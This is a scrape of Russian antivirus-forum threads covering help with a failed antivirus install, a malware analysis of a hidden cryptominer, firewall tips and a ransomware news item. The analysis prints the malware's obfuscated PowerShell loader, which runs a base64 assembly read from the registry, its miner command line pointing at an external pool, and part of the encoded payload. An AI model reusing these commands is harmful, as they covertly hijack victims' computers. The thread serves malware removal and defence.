Выбрать дату в календареВыбрать дату в календаре

[ Закрыто] Ошибка MS 1303 вызвана вредоносными программами. Помогите!, Не могу установить антивирус
хорошо,
возможно установщик ESET находил каталоги с установленными ранее антивирусами, и прекращал установку
[ Закрыто] Ошибка MS 1303 вызвана вредоносными программами. Помогите!, Не могу установить антивирус
+ этот скрипт выполните в FRST
Скопируйте приведенный ниже текст в Блокнот и сохраните файл как fixlist.txt в ту же папку откуда была запущена утилита Farbar Recovery Scan Tool:
Запустите FRST и нажмите один раз на кнопку Fix и подождите. Программа создаст лог-файл (Fixlog.txt). Пожалуйста, прикрепите его в следующем сообщении!

[CODE]
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Restriction <==== ATTENTION
2020-03-08 17:46 - 2020-03-08 17:46 - 000000000 ____D C:\Users\john\AppData\Roaming\AVAST Software
2020-03-08 16:34 - 2020-03-08 22:42 - 000000000 __SHD C:\Users\Все пользователи\Doctor Web
2020-03-08 16:34 - 2020-03-08 22:42 - 000000000 __SHD C:\ProgramData\Doctor Web
2020-03-08 16:34 - 2020-03-08 16:34 - 000000000 __SHD C:\Users\Все пользователи\Norton
2020-03-08 16:34 - 2020-03-08 16:34 - 000000000 __SHD C:\Users\Все пользователи\McAfee
2020-03-08 16:34 - 2020-03-08 16:34 - 000000000 __SHD C:\Users\Все пользователи\Kaspersky Lab Setup Files
2020-03-08 16:34 - 2020-03-08 16:34 - 000000000 __SHD C:\Users\Все пользователи\Kaspersky Lab
2020-03-08 16:34 - 2020-03-08 16:34 - 000000000 __SHD C:\Users\Все пользователи\grizzly
2020-03-08 16:34 - 2020-03-08 16:34 - 000000000 __SHD C:\Users\Все пользователи\ESET
2020-03-08 16:34 - 2020-03-08 16:34 - 000000000 __SHD C:\Users\Все пользователи\360safe
2020-03-08 16:34 - 2020-03-08 16:34 - 000000000 __SHD C:\ProgramData\Norton
2020-03-08 16:34 - 2020-03-08 16:34 - 000000000 __SHD C:\ProgramData\McAfee
2020-03-08 16:34 - 2020-03-08 16:34 - 000000000 __SHD C:\ProgramData\Kaspersky Lab Setup Files
2020-03-08 16:34 - 2020-03-08 16:34 - 000000000 __SHD C:\ProgramData\Kaspersky Lab
2020-03-08 16:34 - 2020-03-08 16:34 - 000000000 __SHD C:\ProgramData\grizzly
2020-03-08 16:34 - 2020-03-08 16:34 - 000000000 __SHD C:\ProgramData\ESET
2020-03-08 16:34 - 2020-03-08 16:34 - 000000000 __SHD C:\ProgramData\360safe
2020-03-08 16:34 - 2020-03-08 16:34 - 000000000 __SHD C:\Program Files\Kaspersky Lab
2020-03-08 16:34 - 2020-03-08 16:34 - 000000000 __SHD C:\Program Files\ESET
2020-03-08 16:34 - 2020-03-08 16:34 - 000000000 __SHD C:\Program Files\COMODO
2020-03-08 16:34 - 2020-03-08 16:34 - 000000000 __SHD C:\Program Files\Common Files\McAfee
2020-03-08 16:34 - 2020-03-08 16:34 - 000000000 __SHD C:\Program Files\Cezurity
2020-03-08 16:34 - 2020-03-08 16:34 - 000000000 __SHD C:\Program Files\AVG
2020-03-08 16:34 - 2020-03-08 16:34 - 000000000 __SHD C:\Program Files (x86)\Panda Security
2020-03-08 16:34 - 2020-03-08 16:34 - 000000000 __SHD C:\Program Files (x86)\Microsoft JDX
2020-03-08 16:34 - 2020-03-08 16:34 - 000000000 __SHD C:\Program Files (x86)\Kaspersky Lab
2020-03-08 16:34 - 2020-03-08 16:34 - 000000000 __SHD C:\Program Files (x86)\GRIZZLY Antivirus
2020-03-08 16:34 - 2020-03-08 16:34 - 000000000 __SHD C:\Program Files (x86)\Cezurity
2020-03-08 16:34 - 2020-03-08 16:34 - 000000000 __SHD C:\Program Files (x86)\AVG
2020-03-08 16:34 - 2020-03-08 16:34 - 000000000 __SHD C:\Program Files (x86)\AVAST Software
2020-03-08 16:34 - 2020-03-08 16:34 - 000000000 __SHD C:\Program Files (x86)\360
2020-03-08 16:34 - 2020-03-08 16:34 - 000000000 __SHD C:\KVRT_Data
EmptyTemp:
Reboot:
[/CODE]
[ Закрыто] Ошибка MS 1303 вызвана вредоносными программами. Помогите!, Не могу установить антивирус
надо раскрыть ветку Software, чтобы убедиться есть там папка WinSys32 или нет.
[ Закрыто] Ошибка MS 1303 вызвана вредоносными программами. Помогите!, Не могу установить антивирус
проверьте, есть у вас в системе такой ключ
[HKEY_CURRENT_USER\Software\WinSys32],
если есть, сделайте экспорт ключа в файл, и добавьте на форум
поговорить о uVS, Carberp, планете Земля
по активным сейчас темам Trojan.Multi.GenAutorunProc.a на некоторых форумах что можно сказать.

симптомы, пример:

[QUOTE]заметил, что моя любимая игрушка начала тормозить, включил msi afterburner с выводом информации про загрузку и температуру процессора на экран, загрузка достигала 50-100% на всех 8 ядрах. Решил открыть диспетчер задач, он показал что процессор загружен на 10-15%, не закрывая диспетчер задач зашел в игру, мси афтербернер показал 10-15%, игра перестала тормозить, закрыл диспетчер задач и игра снова стала тормозить. Я скачал прогу system explorer и она показала запущенный процесс notepad.exe, который потребляет 37,5% процессора. при открытии снова диспетчера задач, notepad.exe скрылся из запущенных процессов в system explorer, после закрытия диспетчера задач, notepad.exe снова запустился.
[/QUOTE]
довольно интересная картина происходит, которая может быть скрыта за текстовыми логами.

есть свежая задача Win32Utilities, из которой запущена dll
C:\Users\Pro\AppData\Roaming\WindowsShell\WindowsDiagnostics.dll
6,00 кб, rsAh, создан: 03.03.2020 19:11:07, изменен: 03.03.2020 19:39:19
следующим образом:
rundll32.exe C:\Users\Pro\AppData\Roaming\WindowsShell\WindowsDiagnostics.dll,Task
и все.

что мы видим в образе автозапуска:
во первых обнаружены потоки внедренные в процесс notepad.exe
[B](!) ПРЕДУПРЕЖДЕНИЕ: Обнаружен внедренный поток в процессе C:\WINDOWS\SYSTEM32\NOTEPAD.EXE [1860], tid=9912[/B]
во вторых, видим процесс, связанный так или иначе с запуском notepad.exe, явно связанный с майнером
[QUOTE]notepad.exe -o playgrounddonate.sytes.net:5555 -u NoFile -p x --randomx-mode=light --threads=4 -k --nicehash --donate-level=0[/QUOTE]
а так же видим процессы связанные с запуском powershell
[QUOTE]"powershell" -ExecutionPolicy Bypass -NoExit -NoProfile -Command $s = (Get-ItemProperty HKCU:\Software\WinSys32\).win;$r = $s.replace('.', '2').replace('(', '3').replace('-', '1'); $b = [System.Convert]::FromBase64String($r);[System.Reflection.Assembly]::Load($b);[GAS.Ad]::CU();Exit(0);
[/QUOTE]
судя по командной строке, часть командной строки формируется из ключа [B]HKCU:\Software\WinSys32[/B], можно предположить, что значение ключа закодировано в base64

каким образом запущены процессы с участием powershell?
а вот отсюда, часть содержимого windowsdiagnostic.dll:
[QUOTE]Maindir Task a p p d a t a \ W i n d o w s S h e l l p o w e r s h e l l ‚%- E x e c u t i o n P o l i c y B y p a s s - N o E x i t - N o P r o f i l e - C o m m a n d $ s = ( G e t - I t e m P r o p e r t y H K C U : \ S o f t w a r e \ W i n S y s 3 2 \ ) . w i n ; $ r = $ s . r e p l a c e ( ' . ' , ' 2 ' ) . r e p l a c e ( ' ( ' , ' 3 ' ) . r e p l a c e ( ' - ' , ' 1 ' ) ; $ b = [ S y s t e m . C o n v e r t ] : : F r o m B a s e 6 4 S t r i n g ( $ r ) ; [ S y s t e m . R e f l e c t i o n . A s s e m b l y ] : : L o a d ( $ b ) ; [ G A S . A d ] : : C U ( ) ; E x i t ( 0 ) [/QUOTE]

какая связь между процессом powershell и notepad?

а вот и явная связь.

по образу видим, что pid=8960 соответствует cmdline:[QUOTE] "powershell" -ExecutionPolicy Bypass -NoExit -NoProfile -Command $s = (Get-ItemProperty HKCU:\Software\WinSys32\).win;$r = $s.replace('.', '2').replace('(', '3').replace('-', '1'); $b = [System.Convert]::FromBase64String($r);[System.Reflection.Assembly]::Load($b);[GAS.Ad]::CU();Exit(0);
[/QUOTE]
а в инфо по notepad видим, что pid=1860 созданный cmdline [QUOTE]"notepad.exe -o playgrounddonate.sytes.net:5555 -u NoFile -p x --randomx-mode=light --threads=4 -k --nicehash --donate-level=0"[/QUOTE]
но родительский процесс для него parentid=8960

остается только найти значение ключа HKCU:\Software\WinSys32, чтобы убедиться, что в нем содержится base64 значение

действительно, ключ содержит base64 код
[QUOTE]Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\WinSys32]
"win"="TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAA­AAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwc­m9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG-vZGUuDQ0KJAAAAAAAAABQRQAAZIYDAJPF0tgAAAAAAAAAAPAALiALAgYAAPo­AAAAIAAAAAAAAAAAAAAAgAAAAAEAAAAAAAAAgAAAAAgAABAAAAAAAAAAEAAA­AAAAAAABgAQAABAAAAAAAAAMAQIUAABAAAAAAAAAQAAAAAAAAAAAQAAAAAAA­AEAAAAAAAAAAAAAAPAAAAAAAAAAAAAAAAAAAAAAAAAABAAQAABAAAAAAAAAA­AAAAAAAAAAAAAAAAAAAAAAAAAghgBABwAAAAAAAAAAAAAAAAAAAAAAAAAAAA­AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAggAABIAAA­AAAAAAAAAAAAudGV4dAAAACT5AAAAIAAAAPoAAAAEAAAAAAAAAAAAAAAAAAA­gAABgLnNkYXRhAAD-AQAAACABAAACAAAA/gAAAAAAAAAAAAAAAAAAQAAAwC5yc(JjAAAAAAQAAABAAQAABAAAAAABAAAAAAAAAAAAAAAAAEAAAEAucmVsb.MAAAwAAAAAYAEAAAIAAAAEAQAAAAAAAAAAAAAAAABAAABCAAAAAAAAAAAAAA­AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA­AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA­AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA­AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA­AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA­AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA­AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA­AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA­AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA­AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA­AAAAAAAAAAAAAAAAAZAQAAAAAASAAAAAIABQBAoAAAqloAAAkAAAAAAAAA6v­oAABgdAAACGAEAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA­AAEzADAKYAAAABAAARKwkoUtEZORQWmiYWLfkXKAsAAAY6YwAAACYgBAAAAD­g.AAAAEgAoAgAABiYgBQAAADgkAAAAEgAGjAMAAAIoCAAABn0BAAAEOCoAAAAg­BAAAAP4OAQD+DAEARQYAAAAQAAAAv////wAAAACt////EAAAACIAAAA4qP//­/yYgAwAAADjT////EgD+FQMAAAIgAQAAADjB////KAkAAA[/QUOTE]

после декодирования получаем бинарный файл

+
update:
теперь вирлаб детектирует его как майнер.
ESET-NOD32:      A Variant Of MSIL/CoinMiner.BDW
https://www.virustotal.com/gui/file/bdca7dd1be0f230efd68cfb824b73a7bf0e326ed3914701­1b5f858370d9e2869/detection
[ Закрыто] Skill to Resolve Login Issues via Xfinity Customer Service, Skill to Resolve Login Issues via Xfinity Customer Service
[B]@albert lisy,[/B] @[B]Jofra archer[/B] и другие:

прекращайте спамить на форуме. это русский форум, так что если есть что сказать по темам форума пишите на русском, как это мы делаем на англоязычных форумах.

Stop spamming the forum. This is a Russian forum, so if you have something to say on the topics of the forum, write in Russian, as we do in English-language forums.
Антивирус не позволяет увидеть компьютеры в локальной сети., NOD 32 Internet Security 13. 0. 24. 0 я не вижу компьютеры подключенные к локальной сети.
добавьте подсети, которым вы доверяете
Антивирус не позволяет увидеть компьютеры в локальной сети., NOD 32 Internet Security 13. 0. 24. 0 я не вижу компьютеры подключенные к локальной сети.
возможно, вы при установке ESS  указали, что ваш компьютер изолирован от внешней сети
Антивирус не позволяет увидеть компьютеры в локальной сети., NOD 32 Internet Security 13. 0. 24. 0 я не вижу компьютеры подключенные к локальной сети.
проверьте настройки фаерволла и попробуйте изменить ее "разрешить доступ к файлам и к принтерам в доверенной зоне".
Шифровирусы шумной толпою
будьте готовы к тому, что ваши данные могут быть не только зашифрованы, но и перед шифрованием скопированы на ресурс злоумышленников,
с тем, чтобы оказать на вас дополнительное давление, шантажируя возможностью публикации ваших данных на сторонних ресурсах,
и продажей ваших данных конкурентам, и прочим третьим лицам.

[QUOTE]Операторы Sodinokibi Ransomware (REvil) начали призывать своих партнеров копировать данные своих жертв перед шифрованием компьютеров, чтобы их можно было использовать в качестве рычага на новом сайте по утечке данных, который скоро будет запущен.

Операторы Sodinokibi Ransomware - предоставляют услуги Ransomware-as-a-Service, где управляют платежным порталом и разрабатывают вымогателей, а сторонние «партнеры» распространяют вымогателей.

Затем операторы и партнеры делятся платой за вымогателей, сделанной жертвами.
[/QUOTE]
https://www.bleepingcomputer.com/news/security/sodinokibi-ransomware-may-tip-nasdaq-on-attacks-to-hurt-stock-prices/